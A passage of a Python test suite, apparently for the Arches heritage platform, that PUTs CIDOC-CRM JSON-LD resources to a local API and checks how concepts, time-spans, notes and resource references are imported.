"http://www.w3.org/2000/01/rdf-schema#label": "Single Type A"
},
"http://www.cidoc-crm.org/cidoc-crm/P3_has_note": "Test Data",
"http://www.cidoc-crm.org/cidoc-crm/P45_consists_of": [
{
"@id": "http://localhost:8000/concepts/9b61c995-71d8-4bce-987b-0ffa3da4c71c",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E57_Material",
"http://www.w3.org/2000/01/rdf-schema#label": "material b"
},
{
"@id": "http://localhost:8000/concepts/36c8d7a3-32e7-49e4-bd4c-2169a06b240a",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E57_Material",
"http://www.w3.org/2000/01/rdf-schema#label": "material a"
}
],
"http://www.cidoc-crm.org/cidoc-crm/P57_has_number_of_parts": 12
}
"""
url = self._create_url(
graph_id="ee72fb1e-fa6c-11e9-b369-3af9d3b32b71",
resource_id="12345678-abcd-11e9-9cbb-3af9d3b32b71",
)
response = self.client.put(url, data=data, HTTP_AUTHORIZATION=f"Bearer {self.token}")
self.assertEqual(response.status_code, 201)
js = response.json()
if type(js) == list:
js = js[0]
self.assertTrue("@id" in js)
self.assertTrue(js["@id"] == "http://localhost:8000/resources/12345678-abcd-11e9-9cbb-3af9d3b32b71")
hagu = "http://www.cidoc-crm.org/cidoc-crm/P101_had_as_general_use"
p2 = "http://www.cidoc-crm.org/cidoc-crm/P2_has_type"
temp = "http://www.cidoc-crm.org/cidoc-crm/P160_has_temporal_projection"
qual = "http://www.cidoc-crm.org/cidoc-crm/P79_beginning_is_qualified_by"
note = "http://www.cidoc-crm.org/cidoc-crm/P3_has_note"
pts = "http://www.cidoc-crm.org/cidoc-crm/P57_has_number_of_parts"
self.assertTrue(hagu in js)
use = js[hagu]
self.assertTrue("@id" in use)
self.assertTrue(use["@id"] == "http://localhost:8000/concepts/fb457e76-e018-41e7-9be3-0f986816450a")
self.assertTrue(p2 in use)
self.assertTrue(use[p2]["@id"] == "http://localhost:8000/concepts/14c92c17-5e2f-413a-95c2-3c5e41ee87d2")
self.assertTrue(temp in js)
proj = js[temp]
self.assertTrue(qual in proj)
self.assertTrue(proj[qual] == "example")
self.assertTrue(note in js)
self.assertTrue(js[note] == "Test Data")
self.assertTrue(pts in js)
self.assertTrue(js[pts] == 12)
def test_2b_complex_multiple(self):
data = """
{
"@id": "http://localhost:8000/resources/5e9baff0-109b-11ea-957a-acde48001122",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E22_Man-Made_Object",
"http://www.cidoc-crm.org/cidoc-crm/P101_had_as_general_use": {
"@id": "http://localhost:8000/concepts/fb457e76-e018-41e7-9be3-0f986816450a",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E55_Type",
"http://www.cidoc-crm.org/cidoc-crm/P2_has_type": {
"@id": "http://localhost:8000/concepts/dcd28b8a-0840-4a7f-a0d6-0341438552e6",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E55_Type",
"http://www.w3.org/2000/01/rdf-schema#label": "Meta Type B"
},
"http://www.w3.org/2000/01/rdf-schema#label": "Test Type A"
},
"http://www.cidoc-crm.org/cidoc-crm/P160_has_temporal_projection": [
{
"@id": "http://localhost:8000/tile/7e0371da-c62f-46c1-899b-d1e9419a76d5/node/127193ea-fa6d-11e9-b369-3af9d3b32b71",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E52_Time-Span",
"http://www.cidoc-crm.org/cidoc-crm/P79_beginning_is_qualified_by": "example 2"
},
{
"@id": "http://localhost:8000/tile/8cc347a4-265d-4a06-8327-e198e1d1d0c5/node/127193ea-fa6d-11e9-b369-3af9d3b32b71",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E52_Time-Span",
"http://www.cidoc-crm.org/cidoc-crm/P79_beginning_is_qualified_by": "example",
"http://www.cidoc-crm.org/cidoc-crm/P82a_begin_of_the_begin": {
"@type": "http://www.w3.org/2001/XMLSchema#dateTime",
"@value": "1903-10-28"
}
},
{
"@id": "http://localhost:8000/tile/6011c512-47e9-46c3-b6f3-034dcc6f2a9d/node/127193ea-fa6d-11e9-b369-3af9d3b32b71",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E52_Time-Span",
"http://www.cidoc-crm.org/cidoc-crm/P82a_begin_of_the_begin": {
"@type": "http://www.w3.org/2001/XMLSchema#dateTime",
"@value": "2019-11-15"
}
},
{
"@id": "http://localhost:8000/tile/7d42af30-4d00-434f-95d4-7a3b3f9bfec8/node/127193ea-fa6d-11e9-b369-3af9d3b32b71",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E52_Time-Span",
"http://www.cidoc-crm.org/cidoc-crm/P79_beginning_is_qualified_by": "example"
}
],
"http://www.cidoc-crm.org/cidoc-crm/P2_has_type": {
"@id": "http://localhost:8000/concepts/6bac5802-a6f8-427c-ba5f-d4b30d5b070e",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E55_Type",
"http://www.w3.org/2000/01/rdf-schema#label": "Single Type A"
},
"http://www.cidoc-crm.org/cidoc-crm/P3_has_note": [
"asdfasdfa",
"1903-10-21"
],
"http://www.cidoc-crm.org/cidoc-crm/P45_consists_of": {
"@id": "http://localhost:8000/concepts/36c8d7a3-32e7-49e4-bd4c-2169a06b240a",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E57_Material",
"http://www.w3.org/2000/01/rdf-schema#label": "material a"
},
"http://www.cidoc-crm.org/cidoc-crm/P57_has_number_of_parts": [
2,
1
]
}
"""
url = self._create_url(
graph_id="ee72fb1e-fa6c-11e9-b369-3af9d3b32b71",
resource_id="5e9baff0-109b-11ea-957a-acde48001122",
)
response = self.client.put(url, data=data, HTTP_AUTHORIZATION=f"Bearer {self.token}")
self.assertEqual(response.status_code, 201)
js = response.json()
if type(js) == list:
js = js[0]
self.assertTrue("@id" in js)
self.assertTrue(js["@id"] == "http://localhost:8000/resources/5e9baff0-109b-11ea-957a-acde48001122")
pts = "http://www.cidoc-crm.org/cidoc-crm/P57_has_number_of_parts"
note = "http://www.cidoc-crm.org/cidoc-crm/P3_has_note"
temp = "http://www.cidoc-crm.org/cidoc-crm/P160_has_temporal_projection"
qual = "http://www.cidoc-crm.org/cidoc-crm/P79_beginning_is_qualified_by"
botb = "http://www.cidoc-crm.org/cidoc-crm/P82a_begin_of_the_begin"
self.assertTrue(pts in js)
self.assertTrue(set(js[pts]) == set([1, 2]))
self.assertTrue(note in js)
self.assertTrue(set(js[note]) == set(["asdfasdfa", "1903-10-21"]))
self.assertTrue(temp in js)
temps = js[temp]
self.assertTrue(len(temps) == 4)
for t in temps:
if qual in t:
self.assertTrue(t[qual] in ["example", "example 2"])
if botb in t:
self.assertTrue(t[botb]["@value"] in ["2019-11-15", "1903-10-28"])
def test_3_5098_concepts(self):
data = """
{
"@id": "http://localhost:8000/resources/0b4439a8-beca-11e9-b4dc-0242ac160002",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E21_Person",
"http://www.cidoc-crm.org/cidoc-crm/P67i_is_referred_to_by": {
"@id": "http://localhost:8000/tile/cad329aa-1802-416e-bbce-5f71e21b1a47/node/accb030c-bec9-11e9-b4dc-0242ac160002",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E33_Linguistic_Object",
"http://www.cidoc-crm.org/cidoc-crm/P2_has_type": [
{
"@id": "http://localhost:8000/concepts/c3c4b8a8-39bb-41e7-af45-3a0c60fa4ddf",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E55_Type",
"http://www.w3.org/2000/01/rdf-schema#label": "Concept 2"
},
{
"@id": "http://localhost:8000/concepts/0bb450bc-8fe3-46cb-968e-2b56849e6e96",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E55_Type",
"http://www.w3.org/2000/01/rdf-schema#label": "Concept 1"
}
]
}
}
"""
url = self._create_url(
graph_id="92ccf5aa-bec9-11e9-bd39-0242ac160002",
resource_id="0b4439a8-beca-11e9-b4dc-0242ac160002",
)
response = self.client.put(url, data=data, HTTP_AUTHORIZATION=f"Bearer {self.token}")
self.assertEqual(response.status_code, 201)
js = response.json()
if type(js) == list:
js = js[0]
print(f"Got JSON for test 3: {js}")
self.assertTrue("@id" in js)
self.assertTrue(js["@id"] == "http://localhost:8000/resources/0b4439a8-beca-11e9-b4dc-0242ac160002")
types = js["http://www.cidoc-crm.org/cidoc-crm/P67i_is_referred_to_by"]["http://www.cidoc-crm.org/cidoc-crm/P2_has_type"]
self.assertTrue(type(types) == list)
self.assertTrue(len(types) == 2)
cids = [
"http://localhost:8000/concepts/c3c4b8a8-39bb-41e7-af45-3a0c60fa4ddf",
"http://localhost:8000/concepts/0bb450bc-8fe3-46cb-968e-2b56849e6e96",
]
self.assertTrue(types[0]["@id"] in cids)
self.assertTrue(types[1]["@id"] in cids)
self.assertTrue(types[0]["@id"] != types[1]["@id"])
def test_4_5098_resinst(self):
# Make instances for this new one to reference
BusinessDataImporter("tests/fixtures/jsonld_base/data/test_2_instances.json").import_business_data()
data = """
{
"@id": "http://localhost:8000/resources/abcd1234-1234-1129-b6e7-3af9d3b32b71",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E22_Man-Made_Object",
"http://www.cidoc-crm.org/cidoc-crm/P130_shows_features_of": [
{
"@id": "http://localhost:8000/resources/12bbf5bc-fa85-11e9-91b8-3af9d3b32b71",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E22_Man-Made_Object"
},
{
"@id": "http://localhost:8000/resources/24d0d25a-fa75-11e9-b369-3af9d3b32b71",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E22_Man-Made_Object"
}
],
"http://www.cidoc-crm.org/cidoc-crm/P3_has_note": "res inst list import"
}
"""
url = self._create_url(
graph_id="ee72fb1e-fa6c-11e9-b369-3af9d3b32b71",
resource_id="abcd1234-1234-1129-b6e7-3af9d3b32b71",
)
response = self.client.put(url, data=data, HTTP_AUTHORIZATION=f"Bearer {self.token}")
print(f"Test 4: {response.content}")
self.assertEqual(response.status_code, 201)
js = response.json()
if type(js) == list:
js = js[0]
# print(f"Got json for test 4: {js}")
self.assertTrue("@id" in js)
self.assertTrue(js["@id"] == "http://localhost:8000/resources/abcd1234-1234-1129-b6e7-3af9d3b32b71")
self.assertTrue("http://www.cidoc-crm.org/cidoc-crm/P130_shows_features_of" in js)
feats = js["http://www.cidoc-crm.org/cidoc-crm/P130_shows_features_of"]
self.assertTrue(type(feats) == list)
self.assertTrue(len(feats) == 2)
rids = [
"http://localhost:8000/resources/12bbf5bc-fa85-11e9-91b8-3af9d3b32b71",
"http://localhost:8000/resources/24d0d25a-fa75-11e9-b369-3af9d3b32b71",
]
self.assertTrue(feats[0]["@id"] in rids)
self.assertTrue(feats[1]["@id"] in rids)
# test that the default ontologyProperties and inverseOntologyProperties are used
tiles = TileModel.objects.filter(resourceinstance_id="abcd1234-1234-1129-b6e7-3af9d3b32b71")
for tile in tiles:
if "ae93f844-fa6d-11e9-b369-3af9d3b32b71" in tile.data:
self.assertEqual(
tile.data["ae93f844-fa6d-11e9-b369-3af9d3b32b71"][0]["ontologyProperty"],
"http://www.cidoc-crm.org/cidoc-crm/P62_depicts",
)
self.assertEqual(
tile.data["ae93f844-fa6d-11e9-b369-3af9d3b32b71"][0]["inverseOntologyProperty"],
"http://www.cidoc-crm.org/cidoc-crm/P62i_is_depicted_by",
)
def test_5_5098_resinst_branch(self):
# 2019-11-01 - Conversely this fails, as it is in a branch
BusinessDataImporter("tests/fixtures/jsonld_base/data/test_2_instances.json").import_business_data()
data = """
{
"@id": "http://localhost:8000/resources/7fffffff-faa1-11e9-84de-3af9d3b32b71",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E22_Man-Made_Object",
"http://www.cidoc-crm.org/cidoc-crm/P67i_is_referred_to_by": {
"@id": "http://localhost:8000/tile/a4896405-5c73-49f4-abd3-651911e82fde/node/51c3ede8-faa1-11e9-84de-3af9d3b32b71",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E33_Linguistic_Object",
"http://www.cidoc-crm.org/cidoc-crm/P128i_is_carried_by": [
{
"@id": "http://localhost:8000/resources/24d0d25a-fa75-11e9-b369-3af9d3b32b71",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E22_Man-Made_Object"
},
{
"@id": "http://localhost:8000/resources/12bbf5bc-fa85-11e9-91b8-3af9d3b32b71",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E22_Man-Made_Object"
}
]
}
}
"""
# Load up the models and data only once
with open(os.path.join("tests/fixtures/jsonld_base/models/5098_b_resinst.json"), "r") as f:
archesfile = JSONDeserializer().deserialize(f)
ResourceGraphImporter(archesfile["graph"])
url = self._create_url(
graph_id="40dbcffa-faa1-11e9-84de-3af9d3b32b71",
resource_id="7fffffff-faa1-11e9-84de-3af9d3b32b71",
)
response = self.client.put(url, data=data, HTTP_AUTHORIZATION=f"Bearer {self.token}")
self.assertEqual(response.status_code, 201)
js = response.json()
if type(js) == list:
js = js[0]
print(f"Got json for test 5: {js}")
self.assertTrue("@id" in js)
self.assertTrue(js["@id"] == "http://localhost:8000/resources/7fffffff-faa1-11e9-84de-3af9d3b32b71")
self.assertTrue("http://www.cidoc-crm.org/cidoc-crm/P67i_is_referred_to_by" in js)
feats = js["http://www.cidoc-crm.org/cidoc-crm/P67i_is_referred_to_by"]["http://www.cidoc-crm.org/cidoc-crm/P128i_is_carried_by"]
self.assertTrue(type(feats) == list)
self.assertTrue(len(feats) == 2)
def test_6_5126_collection_filter(self):
# 2019-11-01 - Fails due to #5126, the concept is not checked against the collection
skos = SKOSReader()
rdf = skos.read_file("tests/fixtures/jsonld_base/rdm/5126-thesaurus.xml")
ret = skos.save_concepts_from_skos(rdf)
skos = SKOSReader()
rdf = skos.read_file("tests/fixtures/jsonld_base/rdm/5126-collections.xml")
ret = skos.save_concepts_from_skos(rdf)
# Load up the models and data only once
with open(os.path.join("tests/fixtures/jsonld_base/models/5126_collection_ambiguity.json"), "r") as f:
archesfile = JSONDeserializer().deserialize(f)
ResourceGraphImporter(archesfile["graph"])
data = """
{
"@id": "http://localhost:8000/resources/69a4af50-c055-11e9-b4dc-0242ac160002",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E22_Man-Made_Object",
"http://www.cidoc-crm.org/cidoc-crm/P2_has_type": {
"@id": "http://vocab.getty.edu/aat/300404216",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E55_Type",
"http://www.w3.org/2000/01/rdf-schema#label": "aquarelles (paintings)"
}
}
"""
url = self._create_url(
graph_id="09e3dc8a-c055-11e9-b4dc-0242ac160002",
resource_id="69a4af50-c055-11e9-b4dc-0242ac160002",
)
response = self.client.put(url, data=data, HTTP_AUTHORIZATION=f"Bearer {self.token}")
print(f"Test 6 response: {response.content}")
self.assertTrue(response.status_code == 201)
js = response.json()
if type(js) == list:
js = js[0]
print(f"Got JSON for test 6: {js}")
self.assertTrue("@id" in js)
self.assertTrue(js["@id"] == "http://localhost:8000/resources/69a4af50-c055-11e9-b4dc-0242ac160002")
self.assertTrue("http://www.cidoc-crm.org/cidoc-crm/P2_has_type" in js)
typ = js["http://www.cidoc-crm.org/cidoc-crm/P2_has_type"]
self.assertTrue(typ["@id"] == "http://vocab.getty.edu/aat/300404216")
def test_7_5121_branches(self):
# 2019-11-01 - This fails due to #5121, the presence of content is not used to rule out the resource-instance branch
data = """
{
"@id": "http://localhost:8000/resources/87654321-c000-1100-b400-0242ac160002",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E21_Person",
"http://www.cidoc-crm.org/cidoc-crm/P67i_is_referred_to_by": {
"@id": "http://localhost:8000/tile/17fa1306-d48f-434e-ad37-fc4c9b09d979/node/d1af9e9e-bf96-11e9-b4dc-0242ac160002",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E33_Linguistic_Object",
"http://www.cidoc-crm.org/cidoc-crm/P2_has_type": {
"@id": "http://localhost:8000/concepts/0bb450bc-8fe3-46cb-968e-2b56849e6e96",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E55_Type",
"http://www.w3.org/2000/01/rdf-schema#label": "Concept 1"
},
"http://www.cidoc-crm.org/cidoc-crm/P3_has_note": "Test Content"
}
}
"""
url = self._create_url(
graph_id="9f716aa2-bf96-11e9-bd39-0242ac160002",
resource_id="87654321-c000-1100-b400-0242ac160002",
)
response = self.client.put(url, data=data, HTTP_AUTHORIZATION=f"Bearer {self.token}")
print(f"Test 7 response: {response.content}")
self.assertTrue(response.status_code == 201)
js = response.json()
if type(js) == list:
js = js[0]
print(f"Got JSON for test 7: {js}")
self.assertTrue("@id" in js)
self.assertTrue(js["@id"] == "http://localhost:8000/resources/87654321-c000-1100-b400-0242ac160002")
lo = js["http://www.cidoc-crm.org/cidoc-crm/P67i_is_referred_to_by"]
self.assertTrue("http://www.cidoc-crm.org/cidoc-crm/P3_has_note" in lo)
self.assertTrue(lo["http://www.cidoc-crm.org/cidoc-crm/P3_has_note"] == "Test Content")
def test_7b_5121_branches(self):
# This loads the referenced resource, 2a615f66...001122
BusinessDataImporter("tests/fixtures/jsonld_base/data/test_5121b_reference_instances.json").import_business_data()
# The third node is the resource-instance, as has_note is required in the semantic branch
# So none of the three nodes are ambiguous and should all load at the same time
data = """
{
"@id": "http://localhost:8000/resources/87654321-c000-1100-b400-0242ac160002",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E21_Person",
"http://www.cidoc-crm.org/cidoc-crm/P67i_is_referred_to_by": [{
"@type": "http://www.cidoc-crm.org/cidoc-crm/E33_Linguistic_Object",
"http://www.cidoc-crm.org/cidoc-crm/P2_has_type": {
"@id": "http://localhost:8000/concepts/0bb450bc-8fe3-46cb-968e-2b56849e6e96",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E55_Type",
"http://www.w3.org/2000/01/rdf-schema#label": "Concept 1"
},
"http://www.cidoc-crm.org/cidoc-crm/P3_has_note": "Test Content"
},
{
"@type": "http://www.cidoc-crm.org/cidoc-crm/E33_Linguistic_Object",
"http://www.cidoc-crm.org/cidoc-crm/P3_has_note": "No Concept, still unique"
},
{
"@id": "http://localhost:8000/resources/2a615f66-114d-11ea-8de7-acde48001122",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E33_Linguistic_Object"
}]
}
"""
url = self._create_url(
graph_id="9f716aa2-bf96-11e9-bd39-0242ac160002",
resource_id="87654321-c000-1100-b400-0242ac160002",
)
response = self.client.put(url, data=data, HTTP_AUTHORIZATION=f"Bearer {self.token}")
print(f"Test 7b response: {response.content}")
self.assertTrue(response.status_code == 201)
js = response.json()
if type(js) == list:
js = js[0]
rtb = "http://www.cidoc-crm.org/cidoc-crm/P67i_is_referred_to_by"
note = "http://www.cidoc-crm.org/cidoc-crm/P3_has_note"
self.assertTrue(rtb in js)
self.assertTrue(len(js[rtb]) == 3)
for r in js[rtb]:
hasnote = note in r
isres = r["@id"].startswith("http://localhost:8000/resources/")
self.assertTrue((hasnote and not isres) or (isres and not hasnote))
self.assertTrue(not (hasnote and isres))
def test_8_4564_resinst_models(self):
with open(os.path.join("tests/fixtures/jsonld_base/models/4564-person.json"), "r") as f:
archesfile = JSONDeserializer().deserialize(f)
ResourceGraphImporter(archesfile["graph"])
with open(os.path.join("tests/fixtures/jsonld_base/models/4564-group.json"), "r") as f:
archesfile = JSONDeserializer().deserialize(f)
ResourceGraphImporter(archesfile["graph"])
with open(os.path.join("tests/fixtures/jsonld_base/models/4564-referenced.json"), "r") as f:
archesfile = JSONDeserializer().deserialize(f)
ResourceGraphImporter(archesfile["graph"])
aux_data = """
{
"@id": "http://localhost:8000/resources/923a5fa8-bfa8-11e9-bd39-0242ac160002",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E74_Group",
"http://www.cidoc-crm.org/cidoc-crm/P3_has_note": "Test Group"
}
"""
url = self._create_url(
graph_id="2c03ddcc-bfa8-11e9-b4dc-0242ac160002",
resource_id="923a5fa8-bfa8-11e9-bd39-0242ac160002",
)
response = self.client.put(url, data=aux_data, HTTP_AUTHORIZATION=f"Bearer {self.token}")
self.assertTrue(response.status_code == 201)
data = """
{
"@id": "http://localhost:8000/resources/940a2c82-bfa8-11e9-bd39-0242ac160002",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E22_Man-Made_Object",
"http://www.cidoc-crm.org/cidoc-crm/P51_has_former_or_current_owner": {
"@id": "http://localhost:8000/resources/923a5fa8-bfa8-11e9-bd39-0242ac160002",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E74_Group"
}
}
"""
url = self._create_url(
graph_id="e3d4505e-bfa7-11e9-b4dc-0242ac160002",
resource_id="940a2c82-bfa8-11e9-bd39-0242ac160002",
)
response = self.client.put(url, data=data, HTTP_AUTHORIZATION=f"Bearer {self.token}")
print(f"Test 8 response: {response.content}")
# this does not currently work
self.assertTrue(response.status_code == 201)
js = response.json()
if type(js) == list:
js = js[0]
print(f"Got JSON for test 8: {js}")
self.assertTrue("@id" in js)
self.assertTrue(js["@id"] == "http://localhost:8000/resources/940a2c82-bfa8-11e9-bd39-0242ac160002")
self.assertTrue("http://www.cidoc-crm.org/cidoc-crm/P51_has_former_or_current_owner" in js)
owner = js["http://www.cidoc-crm.org/cidoc-crm/P51_has_former_or_current_owner"]
self.assertTrue(owner["@id"] == "http://localhost:8000/resources/923a5fa8-bfa8-11e9-bd39-0242ac160002")
def test_9_5299_basic(self):
url = self._create_url(
graph_id="0cadd978-071a-11ea-8d9a-acde48001122",
resource_id="faceb004-dead-11e9-bd39-0242ac160002",
)
data = """
{
"@id": "http://localhost:8000/resources/faceb004-dead-11e9-bd39-0242ac160002",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E22_Man-Made_Object",
"http://www.cidoc-crm.org/cidoc-crm/P108i_was_produced_by": {
"@id": "http://localhost:8000/tile/1580cf8b-1ead-42b7-a22a-cc92bff0aafb/node/1ae420ba-071a-11ea-8d9a-acde48001122",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E12_Production",
"http://www.cidoc-crm.org/cidoc-crm/P3_has_note": "Production"
},
"http://www.cidoc-crm.org/cidoc-crm/P3_has_note": "#ff00ff"
}
"""
response = self.client.put(url, data=data, HTTP_AUTHORIZATION=f"Bearer {self.token}")
print(f"Test 9 response: {response.content}")
self.assertTrue(response.status_code == 201)
js = response.json()
if type(js) == list:
js = js[0]
prod = "http://www.cidoc-crm.org/cidoc-crm/P108i_was_produced_by"
note = "http://www.cidoc-crm.org/cidoc-crm/P3_has_note"
self.assertTrue("@id" in js)
self.assertTrue(js["@id"] == "http://localhost:8000/resources/faceb004-dead-11e9-bd39-0242ac160002")
self.assertTrue(prod in js)
prodjs = js[prod]
self.assertTrue(note in prodjs)
self.assertTrue(prodjs[note] == "Production")
self.assertTrue(note in js)
self.assertTrue(js[note] == "#ff00ff")
def test_a_5299_complex(self):
url = self._create_url(
graph_id="f348bbda-0721-11ea-b628-acde48001122",
resource_id="deadface-0000-11e9-bd39-0242ac160002",
)
data = """
{
"@id": "http://localhost:8000/resources/deadface-0000-11ea-b628-acde48001122",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E22_Man-Made_Object",
"http://www.cidoc-crm.org/cidoc-crm/P108i_was_produced_by": {
"@type": "http://www.cidoc-crm.org/cidoc-crm/E12_Production",
"http://www.cidoc-crm.org/cidoc-crm/P10i_contains": [
{
"@type": "http://www.cidoc-crm.org/cidoc-crm/E4_Period",
"http://www.cidoc-crm.org/cidoc-crm/P3_has_note": "Import Note"
},
{
"@type": "http://www.cidoc-crm.org/cidoc-crm/E4_Period",
"http://www.cidoc-crm.org/cidoc-crm/P4_has_time-span": {
"@type": "http://www.cidoc-crm.org/cidoc-crm/E52_Time-Span",
"http://www.cidoc-crm.org/cidoc-crm/P82a_begin_of_the_begin": {
"@type": "http://www.w3.org/2001/XMLSchema#dateTime",
"@value": "2018-01-01"
}
}
}
]
}
}
"""
response = self.client.put(url, data=data, HTTP_AUTHORIZATION=f"Bearer {self.token}")
print(f"Test 9 response: {response.content}")
self.assertTrue(response.status_code == 201)
js = response.json()
if type(js) == list:
js = js[0]
self.assertTrue("@id" in js)
self.assertTrue(js["@id"] == "http://localhost:8000/resources/deadface-0000-11e9-bd39-0242ac160002")
prod = "http://www.cidoc-crm.org/cidoc-crm/P108i_was_produced_by"
note = "http://www.cidoc-crm.org/cidoc-crm/P3_has_note"
conts = "http://www.cidoc-crm.org/cidoc-crm/P10i_contains"
ts = "http://www.cidoc-crm.org/cidoc-crm/P4_has_time-span"
botb = "http://www.cidoc-crm.org/cidoc-crm/P82a_begin_of_the_begin"
prodjs = js[prod]
contl = prodjs[conts]
self.assertTrue(len(contl) == 2)
if note in contl[0]:
print(f"note data: {contl[0]}")
self.assertTrue(contl[0][note] == "Import Note")
jsts = contl[1][ts]
else:
print(f"note data: {contl[1]}")
self.assertTrue(contl[1][note] == "Import Note")
jsts = contl[0][ts]
self.assertTrue(jsts[botb]["@value"] == "2018-01-01")
def test_b_5600_concept_label(self):
with open(os.path.join("tests/fixtures/jsonld_base/models/5600-external-label.json"), "r") as f:
archesfile = JSONDeserializer().deserialize(f)
ResourceGraphImporter(archesfile["graph"])
data = """
{
"@id": "http://localhost:8000/resources/61787e78-0e3f-11ea-b4f1-acde48001122",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E22_Man-Made_Object",
"http://www.cidoc-crm.org/cidoc-crm/P1_is_identified_by": {
"@type": "http://www.cidoc-crm.org/cidoc-crm/E42_Identifier",
"http://www.cidoc-crm.org/cidoc-crm/P3_has_note": "madonna bla bla",
"http://www.cidoc-crm.org/cidoc-crm/P67i_is_referred_to_by": {
"@type": "http://www.cidoc-crm.org/cidoc-crm/E33_Linguistic_Object",
"http://www.cidoc-crm.org/cidoc-crm/P3_has_note": "sale bla bla"
}
},
"http://www.cidoc-crm.org/cidoc-crm/P2_has_type": {
"@id": "http://vocab.getty.edu/aat/300033898",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E55_Type",
"http://www.w3.org/2000/01/rdf-schema#label": "History"
},
"http://www.cidoc-crm.org/cidoc-crm/P3_has_note": "visual work of madonna bla bla"
}
"""
url = self._create_url(
graph_id="9d2c2ca0-0e3d-11ea-b4f1-acde48001122",
resource_id="61787e78-0e3f-11ea-b4f1-acde48001122",
)
response = self.client.put(url, data=data, HTTP_AUTHORIZATION=f"Bearer {self.token}")
print(f"\n\n\nTest b response: {response.content}")
self.assertTrue(response.status_code == 201)
js = response.json()
if type(js) == list:
js = js[0]
self.assertTrue("@id" in js)
self.assertTrue(js["@id"] == "http://localhost:8000/resources/61787e78-0e3f-11ea-b4f1-acde48001122")
def test_c_path_with_array(self):
with open(os.path.join("tests/fixtures/jsonld_base/models/string_to_path_basic.json"), "r") as f:
archesfile = JSONDeserializer().deserialize(f)
ResourceGraphImporter(archesfile["graph"])
data = """
{
"@id": "http://localhost:8000/resources/5683f462-107d-11ea-b7e9-acde48001122",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E21_Person",
"http://www.cidoc-crm.org/cidoc-crm/P1_is_identified_by": [
{
"@type": "http://www.cidoc-crm.org/cidoc-crm/E41_Appellation",
"http://www.cidoc-crm.org/cidoc-crm/P3_has_note": "remy pour la russie"
},
{
"@type": "http://www.cidoc-crm.org/cidoc-crm/E41_Appellation",
"http://www.cidoc-crm.org/cidoc-crm/P2_has_type": {
"@id": "http://vocab.getty.edu/aat/300033898",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E55_Type",
"http://www.w3.org/2000/01/rdf-schema#label": "History"
},
"http://www.cidoc-crm.org/cidoc-crm/P3_has_note": "remy"
}
],
"http://www.cidoc-crm.org/cidoc-crm/P3_has_note": "remy"
}
"""
url = self._create_url(
graph_id="d5456066-107c-11ea-b7e9-acde48001122",
resource_id="5683f462-107d-11ea-b7e9-acde48001122",
)
response = self.client.put(url, data=data, HTTP_AUTHORIZATION=f"Bearer {self.token}")
print(f"\n\n\nTest c response: {response.content}")
self.assertTrue(response.status_code == 201)
js = response.json()
if type(js) == list:
js = js[0]
self.assertTrue("@id" in js)
self.assertTrue(js["@id"] == "http://localhost:8000/resources/5683f462-107d-11ea-b7e9-acde48001122")
idby = "http://www.cidoc-crm.org/cidoc-crm/P1_is_identified_by"
self.assertTrue(idby in js)
self.assertTrue(len(js[idby]) == 2)
def test_d_path_with_array_2(self):
data = """
{
"@id": "http://localhost:8000/resources/10000000-109b-11ea-957a-acde48001122",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E22_Man-Made_Object",
"http://www.cidoc-crm.org/cidoc-crm/P57_has_number_of_parts": [
2,
1
]
}
"""
url = self._create_url(
graph_id="ee72fb1e-fa6c-11e9-b369-3af9d3b32b71",
resource_id="10000000-109b-11ea-957a-acde48001122",
)
response = self.client.put(url, data=data, HTTP_AUTHORIZATION=f"Bearer {self.token}")
self.assertEqual(response.status_code, 201)
js = response.json()
if type(js) == list:
js = js[0]
self.assertTrue("@id" in js)
self.assertTrue(js["@id"] == "http://localhost:8000/resources/10000000-109b-11ea-957a-acde48001122")
pts = "http://www.cidoc-crm.org/cidoc-crm/P57_has_number_of_parts"
self.assertTrue(pts in js)
self.assertTrue(set(js[pts]) == set([1, 2]))
def test_e_path_with_array_resinst(self):
# 2019-11-27 - Passing with extra @id checks in rdffile
data = """
{
"@id": "http://localhost:8000/resources/8e870000-114e-11ea-8de7-acde48001122",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E21_Person",
"http://www.cidoc-crm.org/cidoc-crm/P67i_is_referred_to_by": [
{
"@type": "http://www.cidoc-crm.org/cidoc-crm/E33_Linguistic_Object",
"http://www.cidoc-crm.org/cidoc-crm/P3_has_note": "test 1"
},
{
"@id": "http://localhost:8000/resources/2a615f66-114d-11ea-8de7-acde48001122",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E33_Linguistic_Object"
}
]
}
"""
